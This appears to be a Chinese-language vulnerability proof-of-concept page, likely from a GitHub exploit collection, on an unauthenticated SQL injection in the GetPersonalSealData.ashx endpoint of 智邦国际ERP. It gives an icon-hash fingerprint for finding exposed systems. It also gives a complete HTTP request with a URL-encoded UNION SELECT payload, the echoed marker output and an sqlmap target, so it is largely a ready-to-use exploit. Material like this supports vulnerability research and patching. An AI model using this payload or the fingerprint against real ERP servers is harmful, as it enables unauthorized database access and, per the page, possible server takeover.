Skip to content

Latest commit

 

History

History
45 lines (32 loc) · 3.03 KB

智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md

File metadata and controls

45 lines (32 loc) · 3.03 KB

智邦国际ERP GetPersonalSealData.ashx接口SQL注入漏洞

一、漏洞复现

智邦国际ERP系统 GetPersonalSealData.ashx接口处存在SQL注入漏洞,未经身份认证的攻击者可利用此漏洞获取数据库敏感信息,深入利用可获取服务器权限。

二、影响版本

  • 智邦国际ERP

三、资产测绘

  • web.icon=="0ab4ed9764a33fd85da03b00f44393e1"
  • 特征

1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8.png

四、漏洞复现

GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=%31%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%32%32%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%36%38%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%38%36%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%37%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%37%36%29%2b%43%48%41%52%28%31%30%34%29%2b%43%48%41%52%28%38%32%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%38%38%29%2b%43%48%41%52%28%31%31%38%29%2b%43%48%41%52%28%37%35%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%37%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%39%29%2b%43%48%41%52%28%38%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%31%29%2b%43%48%41%52%28%31%30%38%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%31%30%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%38%34%29%2b%43%48%41%52%28%38%35%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%30%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2d%2d%20%79%68%6c%73 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=o0oxkf2lkudmy5ueprfeapbl
Upgrade-Insecure-Requests: 1

1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790.png

qzbbqDnuoIViFWuALhRoiXvKeCeEYeBGlBImeTUAnAbdWqqqqq

sqlmap

/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1

1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c.png

更新: 2024-02-29 23:55:42
原文: https://www.yuque.com/xiaokp7/ocvun2/eqzw1z2g14rwg6ue